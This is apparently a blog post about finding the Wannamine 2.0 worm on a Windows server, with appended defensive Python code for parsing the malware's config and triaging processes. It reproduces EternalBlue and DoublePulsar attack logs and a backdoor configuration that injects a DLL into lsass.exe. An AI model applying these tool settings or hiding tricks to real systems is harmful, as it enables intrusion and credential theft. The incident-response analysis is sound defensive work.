Recently a user reported that a certain server always felt sluggish, with noticeable lag, so today I remoted in to take a look.

Opening Task Manager showed very low CPU usage and memory within an acceptable range (10/64 GB). But I have a habit of not trusting the built-in Task Manager for resource usage, so I dropped procexp onto the box and looked again. It showed rundll32.exe consuming about 62% of the CPU, loading and executing a DLL named HalPluginServices.dll. Having read Windows Internals (《深入解析Windows操作系统》), I had some notion of what the Hal (Hardware Abstraction Layer) prefix means. Running alongside it under svhost.exe was spoolsv.exe; at first glance both look like very system-level executables. Hovering over spoolsv.exe to see its path showed: C:\Windows\SpeechsTracing\spoolsv.exe. Seeing the Speech prefix I wondered whether this was related to Microsoft's Narrator feature, and as it happened the directory also contained a Microsoft subdirectory, so at that point I almost believed it. But I noticed that spoolsv.exe was launching cmd, and out of curiosity I checked what command it ran:

C:\Windows\SpeechsTracing\Microsoft\svhost.exe > stage1.txt

Out of curiosity I immediately opened stage1.txt and saw the following:

[*] Connecting to target for exploitation.
[+] Connection established for exploitation.
[*] Pinging backdoor...
[+] Backdoor not installed, game on.
[*] Target OS selected valid for OS indicated by SMB reply
[*] CORE raw buffer dump ( bytes):
0x00000000 6e 6f Windows Server
0x00000010 6e R2 Enterpris
0x00000020 e Service P
0x00000030 6b ack .
[*] Building exploit buffer
[*] Sending all but last fragment of exploit packet
................DONE.
[*] Sending SMB Echo request
[*] Good reply from SMB Echo request
[*] Starting non-paged pool grooming
[+] Sending SMBv2 buffers
..........DONE.
[+] Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] Sending SMB Echo request
[*] Good reply from SMB Echo request
[*] Sending last fragment of exploit packet!
DONE.
[*] Receiving response from exploit packet

This is plainly an SMB attack. Next I looked at stage2.txt in the same directory:

[+] Selected Protocol SMB
[.] Connecting to target...
[+] Connected to target, pinging backdoor...
[+] Backdoor returned code: - Success!
[+] Ping returned Target architecture: x64 (-bit) - XOR Key: 0xEE83B3A2
SMB Connection string is: Windows Server R2 Enterprise Service Pack
Target OS is: R2 x64
Target SP is:
[+] Backdoor installed
[+] DLL built
[.] Sending shellcode to inject DLL
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Command completed successfully
<config xmlns="urn:trch" id="a748cf79831d6c2444050f18217611549fe3f619" configversion="1.3.1.0" name="Doublepulsar" version="1.3.1" schemaversion="2.0.0">
<inputparameters>
<parameter name="NetworkTimeout" description="Timeout for blocking network calls (in seconds). Use -1 for no timeout." type="S16" format="Scalar" valid="true">
<default></default>
<value></value>
</parameter>
<parameter name="TargetIp" description="Target IP Address" type="IPv4" format="Scalar" valid="true">
<value>10.244.251.57</value>
</parameter>
<parameter name="TargetPort" description="Port used by the Double Pulsar back door" type="TcpPort" format="Scalar" valid="true">
<default></default>
<value></value>
</parameter>
<parameter name="LogFile" description="Where to write log file" type="String" format="Scalar" required="false"></parameter>
<parameter name="OutConfig" description="Where to write output parameters file" type="String" format="Scalar" valid="true">
<default>stdout</default>
<value>stdout</value>
</parameter>
<parameter name="ValidateOnly" description="Stop execution after parameter validation" type="Boolean" format="Scalar" valid="true">
<default>false</default>
<value>false</value>
</parameter>
<paramchoice name="Protocol" description="Protocol for the backdoor to speak">
<default>SMB</default>
<value>SMB</value>
<paramgroup name="SMB" description="Ring 0 SMB (TCP 445) backdoor"></paramgroup>
<paramgroup name="RDP" description="Ring 0 RDP (TCP 3389) backdoor"></paramgroup>
</paramchoice>
<paramchoice name="Architecture" description="Architecture of the target OS">
<default>x64</default>
<value>x64</value>
<paramgroup name="x86" description="x86 32-bits"></paramgroup>
<paramgroup name="x64" description="x64 64-bits"></paramgroup>
</paramchoice>
<paramchoice name="Function" description="Operation for backdoor to perform">
<default>OutputInstall</default>
<value>RunDLL</value>
<paramgroup name="OutputInstall" description="Only output the install shellcode to a binary file on disk.">
<parameter name="OutputFile" description="Full path to the output file" type="String" format="Scalar"></parameter>
</paramgroup>
<paramgroup name="Ping" description="Test for presence of backdoor"></paramgroup>
<paramgroup name="RunDLL" description="Use an APC to inject a DLL into a user mode process.">
<parameter name="DllPayload" description="DLL to inject into user mode" type="LocalFile" format="Scalar" valid="true">
<value>C:\Windows\SpeechsTracing\Microsoft\\x64.dll</value>
</parameter>
<parameter name="DllOrdinal" description="The exported ordinal number of the DLL being injected to call" type="U32" format="Scalar" valid="true">
<default></default>
<value></value>
</parameter>
<parameter name="ProcessName" description="Name of process to inject into" type="String" format="Scalar" valid="true">
<default>lsass.exe</default>
<value>lsass.exe</value>
</parameter>
<parameter name="ProcessCommandLine" description="Command line of process to inject into" type="String" format="Scalar" valid="true">
<default></default>
<value></value>
</parameter>
</paramgroup>
<paramgroup name="RunShellcode" description="Run raw shellcode">
<parameter name="ShellcodeFile" description="Full path to the file containing shellcode" type="LocalFile" format="Scalar"></parameter>
<parameter name="ShellcodeData" description="Full path to the file containing shellcode to run" type="LocalFile" format="Scalar"></parameter>
</paramgroup>
<paramgroup name="Uninstall" description="Remove's backdoor from system"></paramgroup>
</paramchoice>
</inputparameters>
<outputparameters>
<paramchoice name="Function" description="Operation for backdoor to perform">
<paramgroup name="OutputInstall" description="Only output the install shellcode to a file on disk.">
<parameter name="ShellcodeFile" description="Full path to the file containing Double Pulsar shellcode installer" type="String" format="Scalar"></parameter>
<parameter name="ShellcodeData" description="Full path to the file containing Double Pulsar shellcode installer" type="LocalFile" format="Scalar"></parameter>
</paramgroup>
<paramgroup name="Ping" description="Test for presence of backdoor">
<parameter name="Is64Bit" description="Is target 64 or 32 bit" type="U32" format="Scalar"></parameter>
</paramgroup>
<paramgroup name="RunDLL" description="Inject a DLL into a user mode process.">
<parameter name="Is64Bit" description="Is target 64 or 32 bit" type="U32" format="Scalar"></parameter>
</paramgroup>
<paramgroup name="Uninstall" description="Remove's backdoor from system">
<parameter name="Is64Bit" description="Is target 64 or 32 bit" type="U32" format="Scalar"></parameter>
</paramgroup>
</paramchoice>
</outputparameters>
</config>
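The `<config xmlns="urn:trch">` block above is the parameter dump the DoublePulsar tool writes to stdout (OutConfig=stdout). The following is an added example, not code from the post or from the tool, that parses such a dump into the facts a responder needs: the chosen `Function` is `RunDLL` even though the `<default>` is `OutputInstall`, and only the matching `<paramgroup>` is in force. The sample XML is constructed here, abbreviated from the page's dump but carrying the page's own values.

```python
import xml.etree.ElementTree as ET

# Constructed sample, abbreviated from the page's config dump (same structure,
# fewer parameters); the values are the page's own.
SAMPLE_CONFIG = r"""<config xmlns="urn:trch" name="Doublepulsar" version="1.3.1">
<inputparameters>
<parameter name="TargetIp" type="IPv4"><value>10.244.251.57</value></parameter>
<paramchoice name="Protocol"><default>SMB</default><value>SMB</value></paramchoice>
<paramchoice name="Architecture"><default>x64</default><value>x64</value></paramchoice>
<paramchoice name="Function">
<default>OutputInstall</default><value>RunDLL</value>
<paramgroup name="OutputInstall"><parameter name="OutputFile" type="String"></parameter></paramgroup>
<paramgroup name="RunDLL">
<parameter name="DllPayload" type="LocalFile"><value>C:\Windows\SpeechsTracing\Microsoft\\x64.dll</value></parameter>
<parameter name="ProcessName" type="String"><default>lsass.exe</default><value>lsass.exe</value></parameter>
</paramgroup>
</paramchoice>
</inputparameters>
</config>"""

def _local(tag):
    """Strip the {urn:trch} namespace so lookups use the bare element name."""
    return tag.rsplit("}", 1)[-1]

def _child_text(elem, child):
    node = next((c for c in elem if _local(c.tag) == child), None)
    return (node.text or "").strip() if node is not None else ""

def summarize_config(xml_text):
    """Flatten the effective settings: <value> wins over <default>, and only the
    paramgroup matching a paramchoice's value is in force (here RunDLL, not the
    OutputInstall default). Keys for group parameters are Choice.Group.Name."""
    root = ET.fromstring(xml_text)
    summary = {"tool": root.get("name"), "version": root.get("version")}
    inputs = next(e for e in root if _local(e.tag) == "inputparameters")
    for elem in inputs:
        kind, name = _local(elem.tag), elem.get("name")
        if kind == "parameter":
            summary[name] = _child_text(elem, "value")
        elif kind == "paramchoice":
            chosen = summary[name] = _child_text(elem, "value")
            for group in elem:
                if _local(group.tag) == "paramgroup" and group.get("name") == chosen:
                    for p in group:
                        if _local(p.tag) == "parameter":
                            summary[f"{name}.{chosen}.{p.get('name')}"] = _child_text(p, "value")
    return summary
```

Run against the real dump, the summary gives the target host (TargetIp), the transport (Protocol SMB), and that a DLL under C:\Windows\SpeechsTracing\Microsoft was injected into lsass.exe; an injection into lsass.exe means credentials on that host should be treated as exposed.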

By now it was basically clear that this was a worm; the directory also held the earlier EternalBlue (Eternalblue-2.2.0.fb). At this point I suddenly realized what was going on: the malware author had made it kill rundll32.exe automatically whenever the user runs Task Manager, creating the illusion of a system using very little CPU. I only found the problem because I used procexp.
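The process facts in this write-up can be turned into a repeatable triage check. The following is an added example, not the post author's code: a snapshot of process name, image path and loaded modules (constructed here to mirror what procexp showed) is checked for a system binary name running outside System32 (spoolsv.exe under C:\Windows\SpeechsTracing), a lookalike name one character away from a real one (svhost.exe vs svchost.exe), and rundll32.exe hosting a DLL from a non-system directory. The on-disk path of HalPluginServices.dll is assumed; the post does not give it. Because the snapshot is data, it can come from any tool, which sidesteps the Task Manager trick described above.

```python
# Constructed snapshot mirroring what procexp showed on the infected server;
# the HalPluginServices.dll path is assumed, the post does not give it.
SAMPLE_PROCESSES = [
    {"name": "spoolsv.exe", "path": r"C:\Windows\System32\spoolsv.exe", "modules": []},
    {"name": "svchost.exe", "path": r"C:\Windows\System32\svchost.exe", "modules": []},
    {"name": "spoolsv.exe", "path": r"C:\Windows\SpeechsTracing\spoolsv.exe", "modules": []},
    {"name": "svhost.exe", "path": r"C:\Windows\SpeechsTracing\Microsoft\svhost.exe", "modules": []},
    {"name": "rundll32.exe", "path": r"C:\Windows\System32\rundll32.exe",
     "modules": [r"C:\Windows\SpeechsTracing\HalPluginServices.dll"]},
]

# Directories where these binaries (and the DLLs rundll32 hosts) are expected.
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
SYSTEM_BINARIES = {"spoolsv.exe", "svchost.exe", "lsass.exe", "rundll32.exe"}

def _one_edit_away(a, b):
    """True when a and b differ by exactly one insertion, deletion or substitution."""
    if a == b or abs(len(a) - len(b)) > 1:
        return False
    if len(a) > len(b):
        a, b = b, a
    i = 0
    while i < len(a) and a[i] == b[i]:
        i += 1
    # Skip the differing char (in both strings for a substitution) and compare tails.
    return a[i + (len(a) == len(b)):] == b[i + 1:]

def triage_processes(procs):
    """Flag the three patterns from the write-up: a system binary name running outside
    System32, a near-miss name (svhost vs svchost), and rundll32 hosting a DLL from
    a non-system directory. Returns (name, reason) pairs."""
    findings = []
    for p in procs:
        name, path = p["name"].lower(), p["path"].lower()
        if name in SYSTEM_BINARIES:
            if not path.startswith(SYSTEM_DIRS):
                findings.append((p["name"], f"system binary name running from {p['path']}"))
        else:
            real = next((b for b in SYSTEM_BINARIES if _one_edit_away(name, b)), None)
            if real:
                findings.append((p["name"], f"lookalike of {real} at {p['path']}"))
        if name == "rundll32.exe":
            for dll in p["modules"]:
                if not dll.lower().startswith(SYSTEM_DIRS):
                    findings.append((p["name"], f"rundll32 loading non-system DLL {dll}"))
    return findings
```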

Post title: Notes on a server infected with the Wannamine 2.0 worm